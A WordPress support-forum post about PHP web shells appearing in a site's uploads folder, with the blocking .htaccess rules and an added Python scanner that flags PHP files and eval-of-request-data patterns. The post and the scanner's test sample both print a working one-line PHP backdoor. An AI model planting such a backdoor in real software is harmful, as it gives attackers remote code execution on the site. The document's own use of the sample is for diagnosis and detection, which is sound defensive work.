Email without subject and php injection
Hi, I have Sucuri on my site, but sometimes I receive a mail “email without subject” and find a *.php file under the wp-content/uploads/ folder. This file contains malicious code like this:
```
<?php @eval($_POST["12345"]);?>984300
```
In this folder I have an .htaccess file:
```
<Files *.php>
deny from all
</Files>
<FilesMatch "\.(?i:php)$">
<IfModule !mod_authz_core.c>
Order allow,deny
Deny from all
</IfModule>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
</FilesMatch>
```
I do not understand how they can upload this .php file in the upload directory.
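The .htaccess rules in the post control how Apache serves files from the folder, not what gets written to disk, so new files there have to be found by inspecting the folder itself. The following is an added example, not part of the original post or of any plugin's code: a Python scan of an uploads tree that flags files by PHP extension, by a PHP open tag in the content, and by eval/assert fed directly from request data. The extension list, the patterns and the function names are assumptions, and the sample tree is constructed, reusing the snippet quoted in the post.

```python
import os
import re
import tempfile

# Assumption: extensions that may be mapped to the PHP handler; adjust to the server config.
PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.IGNORECASE)
# A PHP open tag has no business inside media files, whatever the file is named.
PHP_TAG = re.compile(rb"<\?php", re.IGNORECASE)
# eval()/assert() called directly on request data, as in the snippet from the post.
REQUEST_EVAL = re.compile(
    rb"\b(eval|assert)\s*\(\s*\$_(POST|GET|REQUEST|COOKIE)\b", re.IGNORECASE)

def scan_uploads(root, max_bytes=1_000_000):
    """Return sorted (relative_path, reasons) for every suspicious file under root."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read(max_bytes)  # cap the read for large media files
            except OSError:
                continue  # unreadable file: skip it and keep scanning
            reasons = []
            if PHP_EXT.search(name):
                reasons.append("php-extension")
            if PHP_TAG.search(data):
                reasons.append("php-open-tag")
            if REQUEST_EVAL.search(data):
                reasons.append("eval-of-request-data")
            if reasons:
                findings.append((os.path.relpath(path, root), reasons))
    return sorted(findings)

def demo():
    # Constructed sample tree; the PHP body is the one quoted in the post.
    shell = b'<?php @eval($_POST["12345"]);?>984300'
    samples = {"logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 32,  # clean image header
               "cache.PHP": shell,                               # upper-case extension
               "photo.jpg": b"\xff\xd8\xff\xe0" + shell}         # PHP behind a JPEG header
    with tempfile.TemporaryDirectory() as root:
        for name, body in samples.items():
            with open(os.path.join(root, name), "wb") as fh:
                fh.write(body)
        return scan_uploads(root)

if __name__ == "__main__":
    for rel, reasons in demo():
        print(rel, ", ".join(reasons))
```

On a real site, point `scan_uploads` at the wp-content/uploads path and compare the modification times of flagged files with the web server access log to see which request wrote them.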
- The topic ‘Email without subject and php injection’ is closed to new replies.